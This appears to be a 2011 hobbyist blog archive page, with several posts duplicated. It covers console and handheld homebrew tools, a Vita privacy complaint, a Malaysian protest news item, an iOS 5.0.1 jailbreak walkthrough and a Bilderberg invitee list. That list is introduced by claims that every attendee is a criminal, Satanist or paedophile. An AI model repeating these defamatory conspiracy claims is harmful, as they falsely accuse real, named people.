Saturday, 31 December 2011
Matlo Releases Game Input MultipleXer v0.25
Game Input multiplexer has been released by developer Matlo. Formerly known as Sixaxis Emulator this allows you to control your PS3 via PC using bluetooth or usb. Some features include the connection of up to seven controllers, multiple joysticks, keyboards, mouse and also controller profiles.
GIMX stands for Game Input MultipleXer or Game Input MatriX. The purpose of this software is to control a video game console with a PC. It currently only works with the PS3, but the Xbox 360 is a also targeted.
It operates:
Over bluetooth:
Works with Linux only. A compatible bluetooth dongle is required. Tutorial: Link
Over usb:
Works with Linux and Windows. A usb-usb adapter is required. Tutorial: Link
The application gets data from the PC peripherals (mice, keyboards and joysticks) and sends controls to the PS3 over bluetooth or usb.
Other controls such as gesture or voice are possible through the emulation of PC peripherals.
Changelog v0.25:
The joystick now works / joysticks names are filled in gimx-config
Support of the navigation stick
The "Link Control" menu is checked by default
Config gimx do more bug in Linux
The combo boxes (dropdown lists) of Gimx-serial now work
Features:
Up to 7 controllers (Linux + Bluetooth only) - requires a BT dongle for each controller
Up to 8 profiles per controller
Quick change of the profile with change mode "return"
Supported devices: mice, keyboards, game controllers (gamepads, steering wheels, )
Multiple joysticks, mice and keyboards
Configuration of GUIs with automatic notification and detection devices
Mappings button to button, pin to pin, push-to-pin and pin-to-button
Mapping of the mouse customizable (dead zone, sensitivity, acceleration)
Graphical display of the controller status
Calibration Mode the mouse
Smoothing of the mouse
Macros for clavier
Known Issues:
Motion sensing axis control
Motion sensing events
Custom minimal duration time for button events
1:1 translation
[Windows] Some mouse buttons are not working
[usb] Some games are not compatible with gamepads other than the sixaxis/dualshock 3
TCP/IP Support
Shift states
Translate GUI
Trigger intensity
Support for windows virtual devices (virtual keyboard, )
Event scheduling for macros
Make gimx-fpsconfig capable of editing configs produced by gimx-config
Improvements for config examples
Diamond / flexible dead zone
Auto-updater
Auto-updater for config examples
Remove mouse and keyboard names if "Multiple mice and keyboards" is unchecked.
Source & Downloads:log.gimx.fr
GIMX stands for Game Input MultipleXer or Game Input MatriX. The purpose of this software is to control a video game console with a PC. It currently only works with the PS3, but the Xbox 360 is a also targeted.
It operates:
Over bluetooth:
Works with Linux only. A compatible bluetooth dongle is required. Tutorial: Link
Over usb:
Works with Linux and Windows. A usb-usb adapter is required. Tutorial: Link
The application gets data from the PC peripherals (mice, keyboards and joysticks) and sends controls to the PS3 over bluetooth or usb.
Other controls such as gesture or voice are possible through the emulation of PC peripherals.
Changelog v0.25:
The joystick now works / joysticks names are filled in gimx-config
Support of the navigation stick
The "Link Control" menu is checked by default
Config gimx do more bug in Linux
The combo boxes (dropdown lists) of Gimx-serial now work
Features:
Up to 7 controllers (Linux + Bluetooth only) - requires a BT dongle for each controller
Up to 8 profiles per controller
Quick change of the profile with change mode "return"
Supported devices: mice, keyboards, game controllers (gamepads, steering wheels, )
Multiple joysticks, mice and keyboards
Configuration of GUIs with automatic notification and detection devices
Mappings button to button, pin to pin, push-to-pin and pin-to-button
Mapping of the mouse customizable (dead zone, sensitivity, acceleration)
Graphical display of the controller status
Calibration Mode the mouse
Smoothing of the mouse
Macros for clavier
Known Issues:
Motion sensing axis control
Motion sensing events
Custom minimal duration time for button events
1:1 translation
[Windows] Some mouse buttons are not working
[usb] Some games are not compatible with gamepads other than the sixaxis/dualshock 3
TCP/IP Support
Shift states
Translate GUI
Trigger intensity
Support for windows virtual devices (virtual keyboard, )
Event scheduling for macros
Make gimx-fpsconfig capable of editing configs produced by gimx-config
Improvements for config examples
Diamond / flexible dead zone
Auto-updater
Auto-updater for config examples
Remove mouse and keyboard names if "Multiple mice and keyboards" is unchecked.
Source & Downloads:log.gimx.fr
PS Vita Content Manager Concerns by Wololo
The PS Vita Content Manager has been in the spotlight lately. PS Vita developer Wololo brings news via his blog relating to some concerns he has had and also to clear up a few misinterpretations by some websites.
A few days ago I posted my concerns about the “Content Manager” tool, a tool that is compulsory to install and use if you want to copy files from and to your vita. Some people said I was paranoid (see my answer to that at the end of the article), and others shared my concerns and started digging. Interestingly enough, that article gathered almost as much attention as my much more spectacular (in my opinion) video of a Megadrive emulator running on the vita.
Some sites took my words out of context and said that I had proof Sony is spying on us when we copy files. This is not true, I don’t have any proof, just lots of concerns. Because of that I decided to call Sony’s customer service in order to get more information. Read along.
First of all, a piece of relatively good news: some users on French site psvitagen mentioned that it is possible to copy Movies and Music without being connected to the internet, through the dedicated “Music” and “Movie” sections of the vita. I confirmed this is true, so movies, music and pictures can still be copied to the vita even without an internet connection. The internet connection is however, as far as I can tell, required to copy anything else, which, given the limited possibilities of the vita, basically means PSP/Vita games and/or savedata.
In theory and from what I saw so far, the internet connection is probably used for two things: check for new versions of the firmware (an update was enforced on me if I wanted to keep using the content manager 2 days ago), and possibly do some DRM verifications. That’s the theory, and is somewhat confirmed by some early investigations of the binary by dev Hykem. So, when you copy it to your vita, Sony checks that your Vita game or your Sony-purchased movie is actually “ok” to play on your vita, to make sure you didn’t steal it or copied it from a friend’s computer. Fair enough (although I would question why this check needs to be done there, rather than directly on the vita). But what happens for content that does not require any Sony drm check is my concern. Even though it’s possible to copy them without an internet connection, does Sony gather any information on my music, my pictures, or my movies (and how about my games savedata, which do require the internet connection while being transferred) ? Do they collect filenames, id3 tag, or exif information? Probably not, but more transparency on the subject would definitely be welcome. This is not about hacking here, this is about sending private information to a company that has proven regularly that they cannot be trusted with our data.
So ,full of concerns, I decided to call Sony’s customer service today (actually my wife did it for me…). The person we talked to, as expected, wasn’t a technical person and therefore had close to no information on this. She was aware that an internet connection is required, and mentioned to us that this is written on the manual. We explained that we knew that, and that we have an internet connection (it usually takes time when calling a customer service to explain that you don’t have a technical problem using the software, but an ethical one) , but we’d like to disconnect it when it is not necessary, because we don’t see the point in being connected to Sony’s server when we transfer files between two pieces of hardware we own (at which point my wife added: “especially given what happened to your company recently, we’re a bit concerned about our private information“. Hehe, that’s why I love her ). Understanding our concern the person at the customer service contacted somebody more technical to get more information on the subject. She then came back to us and told us this was in place to make sure that the computer running the content manager is correctly “associated” to the Vita. She didn’t have any technical details to share about the firmware upgrade or the DRM verifications, but she guaranteed us that no personal data was being transferred. She also gave us her name (which I won’t share here) in case we have more questions on the subject (but don’t ask me to call them more, first it’s not a free call, and second I already felt super bad to have my wife spend 30 boring minutes on the phone for me because of my new toy)
(one thing I’d like to say is that every time I contacted Sony’s customer service, their answers were fairly fast and accurate. They usually give me bad news, but they’re doing their best to help. The only time they were completely wrong was when my PSP 1000 stopped accepting connecting to Media Go. They told me it was because the PSP was a Japanese PSP, and I was trying to connect to the European store. I knew this wasn’t true since I had no problem doing the exact same thing with two other PSPs. The real cause was probably that Sony had banned my console for some reason. Anwyays overall thumbs up for the efficiency of the customer service)
So, that’s the official answer, but I’m sure some of us will pass the PC parts of the Content Manager through their microscopes to confirm if this is true. But at least now I have some official information from Sony, which is, in a way, positive. Nevertheless, it does not statisfy my curiosity on some of the files found by Hykem, (such as Mp3Promoter.suprx, png_promoter.suprx, etc…) so I’m sure many people will want to learn more about this thing.
A few days ago I posted my concerns about the “Content Manager” tool, a tool that is compulsory to install and use if you want to copy files from and to your vita. Some people said I was paranoid (see my answer to that at the end of the article), and others shared my concerns and started digging. Interestingly enough, that article gathered almost as much attention as my much more spectacular (in my opinion) video of a Megadrive emulator running on the vita.
Some sites took my words out of context and said that I had proof Sony is spying on us when we copy files. This is not true, I don’t have any proof, just lots of concerns. Because of that I decided to call Sony’s customer service in order to get more information. Read along.
First of all, a piece of relatively good news: some users on French site psvitagen mentioned that it is possible to copy Movies and Music without being connected to the internet, through the dedicated “Music” and “Movie” sections of the vita. I confirmed this is true, so movies, music and pictures can still be copied to the vita even without an internet connection. The internet connection is however, as far as I can tell, required to copy anything else, which, given the limited possibilities of the vita, basically means PSP/Vita games and/or savedata.
In theory and from what I saw so far, the internet connection is probably used for two things: check for new versions of the firmware (an update was enforced on me if I wanted to keep using the content manager 2 days ago), and possibly do some DRM verifications. That’s the theory, and is somewhat confirmed by some early investigations of the binary by dev Hykem. So, when you copy it to your vita, Sony checks that your Vita game or your Sony-purchased movie is actually “ok” to play on your vita, to make sure you didn’t steal it or copied it from a friend’s computer. Fair enough (although I would question why this check needs to be done there, rather than directly on the vita). But what happens for content that does not require any Sony drm check is my concern. Even though it’s possible to copy them without an internet connection, does Sony gather any information on my music, my pictures, or my movies (and how about my games savedata, which do require the internet connection while being transferred) ? Do they collect filenames, id3 tag, or exif information? Probably not, but more transparency on the subject would definitely be welcome. This is not about hacking here, this is about sending private information to a company that has proven regularly that they cannot be trusted with our data.
So ,full of concerns, I decided to call Sony’s customer service today (actually my wife did it for me…). The person we talked to, as expected, wasn’t a technical person and therefore had close to no information on this. She was aware that an internet connection is required, and mentioned to us that this is written on the manual. We explained that we knew that, and that we have an internet connection (it usually takes time when calling a customer service to explain that you don’t have a technical problem using the software, but an ethical one) , but we’d like to disconnect it when it is not necessary, because we don’t see the point in being connected to Sony’s server when we transfer files between two pieces of hardware we own (at which point my wife added: “especially given what happened to your company recently, we’re a bit concerned about our private information“. Hehe, that’s why I love her ). Understanding our concern the person at the customer service contacted somebody more technical to get more information on the subject. She then came back to us and told us this was in place to make sure that the computer running the content manager is correctly “associated” to the Vita. She didn’t have any technical details to share about the firmware upgrade or the DRM verifications, but she guaranteed us that no personal data was being transferred. She also gave us her name (which I won’t share here) in case we have more questions on the subject (but don’t ask me to call them more, first it’s not a free call, and second I already felt super bad to have my wife spend 30 boring minutes on the phone for me because of my new toy)
(one thing I’d like to say is that every time I contacted Sony’s customer service, their answers were fairly fast and accurate. They usually give me bad news, but they’re doing their best to help. The only time they were completely wrong was when my PSP 1000 stopped accepting connecting to Media Go. They told me it was because the PSP was a Japanese PSP, and I was trying to connect to the European store. I knew this wasn’t true since I had no problem doing the exact same thing with two other PSPs. The real cause was probably that Sony had banned my console for some reason. Anwyays overall thumbs up for the efficiency of the customer service)
So, that’s the official answer, but I’m sure some of us will pass the PC parts of the Content Manager through their microscopes to confirm if this is true. But at least now I have some official information from Sony, which is, in a way, positive. Nevertheless, it does not statisfy my curiosity on some of the files found by Hykem, (such as Mp3Promoter.suprx, png_promoter.suprx, etc…) so I’m sure many people will want to learn more about this thing.
Lelaki bertopeng kejutkan sambutan 2012
Keceriaan pengunjung selepas menyaksikan pengiraan detik 12 malam sempena Tahun Baru 2012 di Dataran Merdeka sedikit terganggu apabila sekumpulan lelaki bertopeng dikesan berhampiran lokasi sambutan.
Kumpulan yang disertai kira-kira 100 orang itu dilihat melakukan beberapa aktiviti, dipercayai bagi memperjuangkan kebebasan berkumpul di negara ini.
Mereka bagaimanapun dilihat tidak mengganggu kira-kira 50,000 pengunjung yang hadir bagi menyaksikan konsert Ambang 2012 anjuran Kementerian Penerangan Komunikasi dan Kebudayaan, bermula seawal 8 malam.
Anggota kumpulan itu ada yang memakai kemeja-T tertera tulisan 'Occupy Dataran' dan topeng yang beraspirasikan filem terkenal 'V For Vendetta' manakala sebahagian lagi berpakaian putih, yang dipercayai bermotifkan perjuangan agama.
Polis dilihat dapat mengawal keadaan sehingga semua pengunjung termasuk kumpulan terbabit bergerak meninggalkan Dataran Merdeka.
Sumber,
MalaysiaKini
Kumpulan yang disertai kira-kira 100 orang itu dilihat melakukan beberapa aktiviti, dipercayai bagi memperjuangkan kebebasan berkumpul di negara ini.
Mereka bagaimanapun dilihat tidak mengganggu kira-kira 50,000 pengunjung yang hadir bagi menyaksikan konsert Ambang 2012 anjuran Kementerian Penerangan Komunikasi dan Kebudayaan, bermula seawal 8 malam.
Anggota kumpulan itu ada yang memakai kemeja-T tertera tulisan 'Occupy Dataran' dan topeng yang beraspirasikan filem terkenal 'V For Vendetta' manakala sebahagian lagi berpakaian putih, yang dipercayai bermotifkan perjuangan agama.
Polis dilihat dapat mengawal keadaan sehingga semua pengunjung termasuk kumpulan terbabit bergerak meninggalkan Dataran Merdeka.
Sumber,
MalaysiaKini
Friday, 30 December 2011
Showtime Repack v3.3.356 by Redsquirrel87
Redsquirrel has released an updated version of his unofficial Showtime Media Player repacks. Version 3.3.356 bring the following changes.
Update german translation de_DE
Update Danish translation
VDPAU: Disable spatial deinterlacing on 1080 content. Not all GPUs are fast enuf
VDPAU: If height == 1088, say it's 1080 because it works!
htsp: increase buffer
upnp: Fix arist images in screensaver. Also plug a memory leak
glw: Add support for simulating texture load failures
Use rstr_t on more places
Fix problems with multiopt in javascript
Revert "Add prop_select_first()"
multiopt setting: Make sure something is always selected
Add prop_select_first()
Source: Redsquirrel Twitter
Download: Showtime Repack v3.3.356
Wednesday, 28 December 2011
Official Bilderberg List Of Freemason / Iluminati Satanic Banker Scum 2011
Only Crooks, Traitors to Humanity, Satanists, Murderers and Paedophiles get invited to this Annual meeting of the Bilderbergs! Here is the list of the above types of offenders.
Thanks to Melody for this list. ;-)
Final Unofficial List of Invitees to the 2011 Bilderberg Conference
St. Moritz, Switzerland—June 9-12, 2011
DEU Ackermann, Josef Deutsche Bank AG
GBR Agius, Marcus Chairman, Barclays PLC
USA Alexander, Keith B. Director, National Security Agency
INT Almunia, Joaquín Vice President, Euro. Commission
USA Altman, Roger C. Chairman, Evercore Partners Inc.
FIN Apunen, Matti Finnish Business and Policy Forum
PRT Balsemão, Francisco CEO, IMPRESA, Former PM
FRA Baverez, Nicolas Partner, Gibson, Dunn & Crutcher
FRA Bazire, Nicolas Mʼging Dir. Groupe Arnault /LVMH
ITA Bernabè, Franco CEO, Telecom Italia SpA
USA Bezos, Jeff Founder and CEO, Amazon.com
SWE Bildt, Carl Minister of Foreign Affairs
SWE Björling, Ewa Minister for Trade
NLD Bolland, Marc J. Chief Executive, Marks & Spencer
CHE Brabeck-Letmathe, P. Chairman, Nestlé S.A.
AUT Bronner, Oscar CEO, Standard Medien AG
CAN Carney, Mark J. Governor, Bank of Canada
FRA Castries, Henri de Chairman and CEO, AXA
ESP Cebrián, Juan Luis CEO, PRISA media
NLD Chavannes, Marc E. Columnist, NRC Handelsblad
TUR Ciliv, Süreyya CEO, Turkcell Iletisim Hizmetleri
CAN Clark, Edmund President /CEO, TD Bank Financial
BEL Coene, Luc Governor, National Bank of Belgium
USA Collins, Timothy C. CEO, Ripplewood Holdings, LLC
ESP Cospedal, Maria Secretary General, Partido Popular
INT Daele, Frans van Chief of Staff/European Council
GRC David, George A. Chairman, Coca-Cola H.B.C. S.A.
BEL Davignon, Etienne Minister of State, honorary BB chair
DNK Eldrup, Anders CEO, DONG Energy
ITA Elkann, John Chairman, Fiat S.p.A.
DEU Enders, Thomas CEO, Airbus SAS
AUT Faymann, Werner Federal Chancellor
DNK Federspiel, Ulrik VP, Global Affairs, Haldor Topsøe
USA Feldstein, Martin S. Professor of Economics, Harvard
PRT Ferreira Alves, Clara CEO, Claref LDA; writer
GBR Flint, Douglas J. Group Chairman, HSBC Holdings
CHN Fu Ying Vice Minister of Foreign Affairs
USA Gates, Robert Secretary of Defense
USA Gates, William Chairman, Microsoft Corp.
IRL Gallagher, Paul Senior Counsel; Former AG
CHE Groth, Hans Top-level Exec., Pfizer Europe
TUR Gülek Domac, Tayyibe Former Minister of State
NLD Halberstadt, Victor Honorary Sec. Gen. of BB Meetings
GRC Hardouvelis, Gikas A. Chief Economist, Eurobank EFG
USA Hoffman, Reid Exec. Chair., LinkedIn
CHN Huang Yiping Professor of Economics, Peking U.
USA Hughes, Chris R. Co-founder, Facebook
USA Jacobs, Kenneth M. Chairman & CEO, Lazard
CHE Janom Steiner, Barbara DOJ, Sec. & Health, Canton Grisons
FIN Johansson, Ole Confederation of Finnish Industries
USA Johnson, James A. Vice Chairman, Perseus, LLC
USA Jordan, Jr., Vernon E. Sr. Exec., Lazard Frères & Co. LLC
USA Keane, John M. (Gen.) SCP Partners; U.S. Army, Retired
GBR Kerr, John House of Lords; De. Chair., Royal Dutch Shell
USA Kissinger, Henry A. Chairman, Kissinger Associates, Inc.
USA Kleinfeld, Klaus Chairman and CEO, Alcoa
TUR Koç, Mustafa V. Chairman, Koç Holding A.S.
USA Kravis, Henry R. Co-CEO, Kohlberg Kravis Roberts & Co.
USA Kravis, Marie-Josée Senior Fellow, Hudson Institute, Inc.
INT Kroes, Neelie VP European Commission
CHE Kudelski, André Chair./CEO, Kudelski Group SA
GBR Lambert, Richard Ernst & Young
INT Lamy, Pascal Dir. Gen., World Trade Organization
ESP León Gross, B. Sec. Gen. of the Spanish Presidency
CHE Leuthard, Doris Federal Councillor (president)
FRA Lévy, Maurice Chairman and CEO, Publicis Groupe
BEL Leysen, Thomas Chairman, Umicore
USA Li, Cheng Senior Fellow, Brookings Institution
DEU Löscher, Peter President and CEO, Siemens AG
GBR Mandelson, Peter House of Lords; Chair., Global Couns.
IRL McDowell, Michael Former Deputy PM
CAN McKenna, Frank Deputy Chair, TD Bank Financial
DEU Merkel, Angela Chancellor of Germany
GBR Micklethwait, John Editor-in-Chief, The Economist
FRA Montbrial, Thierry de President, French Institute for Intʼl Rel.
ITA Monti, Mario President, Luigi Bocconi
RUS Mordashov, Alexey A. CEO, Severstal
USA Mundie, Craig J. Chief Strategy Officer, Microsoft
NOR Myklebust, Egil Former Chairman, Norsk Hydro ASA
DEU Nass, Matthias Intʼl Correspondent, Die Zeit
ESP Nin Génova, Juan María President and CEO, La Caixa
PRT Nogueira Leite, António Board, José de Mello Investimentos
NOR Norway, H.R.H. Crown Prince Haakon
FIN Ollila, Jorma Chairman, Royal Dutch Shell
NLD Oranje, Beatrix van Queen of the Netherlands
CAN Orbinksi, James Professor, University of Toronto
USA Orszag, Peter R. Vice Chair., Citigroup Global Markets
GBR Osborne, George Chancellor of the Exchequer
NOR Ottersen, Ole Petter Rector, University of Oslo
GRC Papaconstantinou, G. Minister of Finance
TUR Pekin, Sefika Founding Partner, Pekin & Bayar
FIN Pentikäinen, Mikael Editor-in-Chief, Helsingin Sanomat
USA Perle, Richard N. American Enterprise Institute
CAN Prichard, J. Robert S. Chair, Torys LLP
CAN Reisman, Heather Chair./CEO, Indigo Books & Music
DNK Rasmussen, Anders NATO Secretary General
USA Rockefeller, David Former Chairman, Chase Manhattan
INT Rompuy, Herman van President, European Council
USA Rose, Charlie Exec. Editor/Anchor, Charlie Rose
NLD Rosenthal, Uri Minister of Foreign Affairs
AUT Rothensteiner, Walter Raiffeisen Zentralbank Österreich
FRA Roy, Olivier Professor, European Univ. Institute
USA Rubin, Robert E. CFR; former Treasury Secretary
ITA Scaroni, Paolo CEO, Eni S.p.A.
CHE Schmid, Martin President, Canton Grisons
USA Schmidt, Eric Executive Chairman, Google Inc.
AUT Scholten, Rudolf Oesterreichische Kontrollbank AG
DNK Schütze, Peter Nordea Bank AB
CHE Schweiger, Rolf Swiss Council of States
INT Sheeran, Josette Exec. Dir., UN World Food Program
CHE Soiron, Rolf Holcim Ltd., Lonza Ltd.
INT Solana Madariaga, J. ESADEgeo Ctr. for Glob. Econ. & Geopol.
NOR Solberg, Erna Leader of the Conservative Party
ESP Spain, H.M. Queen Sofia
USA Steinberg, James B. Deputy Secretary of State
DEU Steinbrück, Peer Member of the Bundestag
GBR Stewart, Rory Member of Parliament
IRL Sutherland, Peter D. Chairman, Goldman Sachs
GBR Taylor, J. Martin Chairman, Syngenta International
USA Thiel, Peter A. President, Clarium Capital
ITA Tremonti, Giulio Minister of Economy and Finance
INT Trichet, Jean-Claude President, European Central Bank
GRC Tsoukalis, Loukas President, ELIAMEP
USA Varney, Christine A. Assistant AG for Antitrust
CHE Vasella, Daniel L. Chairman, Novartis AG
USA Vaupel, James W. Founding Director, Max Planck Instit.
SWE Wallenberg, Jacob Chairman, Investor AB
USA Warsh, Kevin Former Gov., Federal Res. Board
NLD Winter, Jaap W. De Brauw Blackstone Westbroek
CHE Witmer, Jürg Chairman, Givaudan and Clariant
INT Wolfensohn, James Chairman, Wolfensohn & Company
ESP Zapatero, Jose Luis Prime Minister of Spain
USA Zoellick, Robert B. President, The World Bank Group
JOURNALISTS
GBR Bredow, Vendeline von The Economist
GBR Wooldridge, Adrian D. The Economist
*COUNTRY CODE/NATION OF ORIGIN:
KEY: AUT: Austria; BEL: Belgium; CAN: Canada; CHE: Switzerland;
CHN: China; DEU: Germany; DNK: Denmark; ESP: Spain; FIN: Finland;
FRA: France; GRC: Greece; GBR: Great Britain; INT: International; IRL:
Ireland; ITA: Italy; NLD: the Netherlands; NOR: Norway; PRT: Portugal;
RUS: Russia; SWE: Sweden; TUR: Turkey; USA: United States
Thanks to Melody for this list. ;-)
Final Unofficial List of Invitees to the 2011 Bilderberg Conference
St. Moritz, Switzerland—June 9-12, 2011
DEU Ackermann, Josef Deutsche Bank AG
GBR Agius, Marcus Chairman, Barclays PLC
USA Alexander, Keith B. Director, National Security Agency
INT Almunia, Joaquín Vice President, Euro. Commission
USA Altman, Roger C. Chairman, Evercore Partners Inc.
FIN Apunen, Matti Finnish Business and Policy Forum
PRT Balsemão, Francisco CEO, IMPRESA, Former PM
FRA Baverez, Nicolas Partner, Gibson, Dunn & Crutcher
FRA Bazire, Nicolas Mʼging Dir. Groupe Arnault /LVMH
ITA Bernabè, Franco CEO, Telecom Italia SpA
USA Bezos, Jeff Founder and CEO, Amazon.com
SWE Bildt, Carl Minister of Foreign Affairs
SWE Björling, Ewa Minister for Trade
NLD Bolland, Marc J. Chief Executive, Marks & Spencer
CHE Brabeck-Letmathe, P. Chairman, Nestlé S.A.
AUT Bronner, Oscar CEO, Standard Medien AG
CAN Carney, Mark J. Governor, Bank of Canada
FRA Castries, Henri de Chairman and CEO, AXA
ESP Cebrián, Juan Luis CEO, PRISA media
NLD Chavannes, Marc E. Columnist, NRC Handelsblad
TUR Ciliv, Süreyya CEO, Turkcell Iletisim Hizmetleri
CAN Clark, Edmund President /CEO, TD Bank Financial
BEL Coene, Luc Governor, National Bank of Belgium
USA Collins, Timothy C. CEO, Ripplewood Holdings, LLC
ESP Cospedal, Maria Secretary General, Partido Popular
INT Daele, Frans van Chief of Staff/European Council
GRC David, George A. Chairman, Coca-Cola H.B.C. S.A.
BEL Davignon, Etienne Minister of State, honorary BB chair
DNK Eldrup, Anders CEO, DONG Energy
ITA Elkann, John Chairman, Fiat S.p.A.
DEU Enders, Thomas CEO, Airbus SAS
AUT Faymann, Werner Federal Chancellor
DNK Federspiel, Ulrik VP, Global Affairs, Haldor Topsøe
USA Feldstein, Martin S. Professor of Economics, Harvard
PRT Ferreira Alves, Clara CEO, Claref LDA; writer
GBR Flint, Douglas J. Group Chairman, HSBC Holdings
CHN Fu Ying Vice Minister of Foreign Affairs
USA Gates, Robert Secretary of Defense
USA Gates, William Chairman, Microsoft Corp.
IRL Gallagher, Paul Senior Counsel; Former AG
CHE Groth, Hans Top-level Exec., Pfizer Europe
TUR Gülek Domac, Tayyibe Former Minister of State
NLD Halberstadt, Victor Honorary Sec. Gen. of BB Meetings
GRC Hardouvelis, Gikas A. Chief Economist, Eurobank EFG
USA Hoffman, Reid Exec. Chair., LinkedIn
CHN Huang Yiping Professor of Economics, Peking U.
USA Hughes, Chris R. Co-founder, Facebook
USA Jacobs, Kenneth M. Chairman & CEO, Lazard
CHE Janom Steiner, Barbara DOJ, Sec. & Health, Canton Grisons
FIN Johansson, Ole Confederation of Finnish Industries
USA Johnson, James A. Vice Chairman, Perseus, LLC
USA Jordan, Jr., Vernon E. Sr. Exec., Lazard Frères & Co. LLC
USA Keane, John M. (Gen.) SCP Partners; U.S. Army, Retired
GBR Kerr, John House of Lords; De. Chair., Royal Dutch Shell
USA Kissinger, Henry A. Chairman, Kissinger Associates, Inc.
USA Kleinfeld, Klaus Chairman and CEO, Alcoa
TUR Koç, Mustafa V. Chairman, Koç Holding A.S.
USA Kravis, Henry R. Co-CEO, Kohlberg Kravis Roberts & Co.
USA Kravis, Marie-Josée Senior Fellow, Hudson Institute, Inc.
INT Kroes, Neelie VP European Commission
CHE Kudelski, André Chair./CEO, Kudelski Group SA
GBR Lambert, Richard Ernst & Young
INT Lamy, Pascal Dir. Gen., World Trade Organization
ESP León Gross, B. Sec. Gen. of the Spanish Presidency
CHE Leuthard, Doris Federal Councillor (president)
FRA Lévy, Maurice Chairman and CEO, Publicis Groupe
BEL Leysen, Thomas Chairman, Umicore
USA Li, Cheng Senior Fellow, Brookings Institution
DEU Löscher, Peter President and CEO, Siemens AG
GBR Mandelson, Peter House of Lords; Chair., Global Couns.
IRL McDowell, Michael Former Deputy PM
CAN McKenna, Frank Deputy Chair, TD Bank Financial
DEU Merkel, Angela Chancellor of Germany
GBR Micklethwait, John Editor-in-Chief, The Economist
FRA Montbrial, Thierry de President, French Institute for Intʼl Rel.
ITA Monti, Mario President, Luigi Bocconi
RUS Mordashov, Alexey A. CEO, Severstal
USA Mundie, Craig J. Chief Strategy Officer, Microsoft
NOR Myklebust, Egil Former Chairman, Norsk Hydro ASA
DEU Nass, Matthias Intʼl Correspondent, Die Zeit
ESP Nin Génova, Juan María President and CEO, La Caixa
PRT Nogueira Leite, António Board, José de Mello Investimentos
NOR Norway, H.R.H. Crown Prince Haakon
FIN Ollila, Jorma Chairman, Royal Dutch Shell
NLD Oranje, Beatrix van Queen of the Netherlands
CAN Orbinksi, James Professor, University of Toronto
USA Orszag, Peter R. Vice Chair., Citigroup Global Markets
GBR Osborne, George Chancellor of the Exchequer
NOR Ottersen, Ole Petter Rector, University of Oslo
GRC Papaconstantinou, G. Minister of Finance
TUR Pekin, Sefika Founding Partner, Pekin & Bayar
FIN Pentikäinen, Mikael Editor-in-Chief, Helsingin Sanomat
USA Perle, Richard N. American Enterprise Institute
CAN Prichard, J. Robert S. Chair, Torys LLP
CAN Reisman, Heather Chair./CEO, Indigo Books & Music
DNK Rasmussen, Anders NATO Secretary General
USA Rockefeller, David Former Chairman, Chase Manhattan
INT Rompuy, Herman van President, European Council
USA Rose, Charlie Exec. Editor/Anchor, Charlie Rose
NLD Rosenthal, Uri Minister of Foreign Affairs
AUT Rothensteiner, Walter Raiffeisen Zentralbank Österreich
FRA Roy, Olivier Professor, European Univ. Institute
USA Rubin, Robert E. CFR; former Treasury Secretary
ITA Scaroni, Paolo CEO, Eni S.p.A.
CHE Schmid, Martin President, Canton Grisons
USA Schmidt, Eric Executive Chairman, Google Inc.
AUT Scholten, Rudolf Oesterreichische Kontrollbank AG
DNK Schütze, Peter Nordea Bank AB
CHE Schweiger, Rolf Swiss Council of States
INT Sheeran, Josette Exec. Dir., UN World Food Program
CHE Soiron, Rolf Holcim Ltd., Lonza Ltd.
INT Solana Madariaga, J. ESADEgeo Ctr. for Glob. Econ. & Geopol.
NOR Solberg, Erna Leader of the Conservative Party
ESP Spain, H.M. Queen Sofia
USA Steinberg, James B. Deputy Secretary of State
DEU Steinbrück, Peer Member of the Bundestag
GBR Stewart, Rory Member of Parliament
IRL Sutherland, Peter D. Chairman, Goldman Sachs
GBR Taylor, J. Martin Chairman, Syngenta International
USA Thiel, Peter A. President, Clarium Capital
ITA Tremonti, Giulio Minister of Economy and Finance
INT Trichet, Jean-Claude President, European Central Bank
GRC Tsoukalis, Loukas President, ELIAMEP
USA Varney, Christine A. Assistant AG for Antitrust
CHE Vasella, Daniel L. Chairman, Novartis AG
USA Vaupel, James W. Founding Director, Max Planck Instit.
SWE Wallenberg, Jacob Chairman, Investor AB
USA Warsh, Kevin Former Gov., Federal Res. Board
NLD Winter, Jaap W. De Brauw Blackstone Westbroek
CHE Witmer, Jürg Chairman, Givaudan and Clariant
INT Wolfensohn, James Chairman, Wolfensohn & Company
ESP Zapatero, Jose Luis Prime Minister of Spain
USA Zoellick, Robert B. President, The World Bank Group
JOURNALISTS
GBR Bredow, Vendeline von The Economist
GBR Wooldridge, Adrian D. The Economist
*COUNTRY CODE/NATION OF ORIGIN:
KEY: AUT: Austria; BEL: Belgium; CAN: Canada; CHE: Switzerland;
CHN: China; DEU: Germany; DNK: Denmark; ESP: Spain; FIN: Finland;
FRA: France; GRC: Greece; GBR: Great Britain; INT: International; IRL:
Ireland; ITA: Italy; NLD: the Netherlands; NOR: Norway; PRT: Portugal;
RUS: Russia; SWE: Sweden; TUR: Turkey; USA: United States
iOS 5.0.1 Untethered Jailbreak is here!
Merry late Christmas! It's here! he iPhone Dev-team has just pushed Redsn0w 0.9.10 b1 to jailbreak 5.0.1 untethered on iPhone 4, 3GS, iPod touch 4G, 3G and iPad 1. pod2g, the man behind the untethered jailbreak, handed his project to iPhone Dev Team and Chronic Dev Team to get implemented on both redsn0w and greenpois0n to release the final product -- iOS 5.0.1 untethered jailbreak.
Supported devices :
iPhone 4 GSM
iPhone 4 CDMA
iPhone 3GS
iPod touch 4G
iPod touch 3G
iPad 1
If you have one of those devices and are not on 5.0.1 yet, update now! The SHSH window is still open for 5.0.1 If you unlock via ultrasn0w or gevey, make sure you only get to 5.0.1 via a custom IPSW! Once you’re at 5.0.1, use the latest redsn0w 0.9.10 to both jailbreak and untether.
If you’re already at 5.0.1 with a tethered jailbreak, you have two choices: either run redsn0w 0.9.10 over your current jailbreak (deselect “Install Cydia” if you do that), or install the Cydia package prepared by the chronic devteam. The patches are the same regardless of which you choose.
Some of you are using a hybrid 5.0/5.0.1 configuration. If so, do not attempt to install this untether over that setup! You will most likely get into a reboot cycle. Do a sync and fresh restore to 5.0.1 then install the jailbreak + untether.
How to jailbreak your iDevice:
Connect your iDevice with your PC via USB, and open iTunes then Restore to iOS 5.0.1 (If you are already running iOS 5.0.1, bypass this step)
Start Redsn0w 0.9.10 b1, and press on "Jailbreak" button
Now select “Install Cydia” and click “Next”.
Now make sure your device is both OFF and PLUGGED IN to the computer before you click “Next”.
At this stage you will be presented with a screen where you will be guided on how to enter DFU mode. Quickly hold “Power” button and then while holding the “Power” button, you will now have to hold “Home” button too. Now after few seconds release “Power” button but keep holding “Home” button until installation begins.
Wait until you get iOS 5.0.1 untethered jailbroken in few minutes.
Downloads:
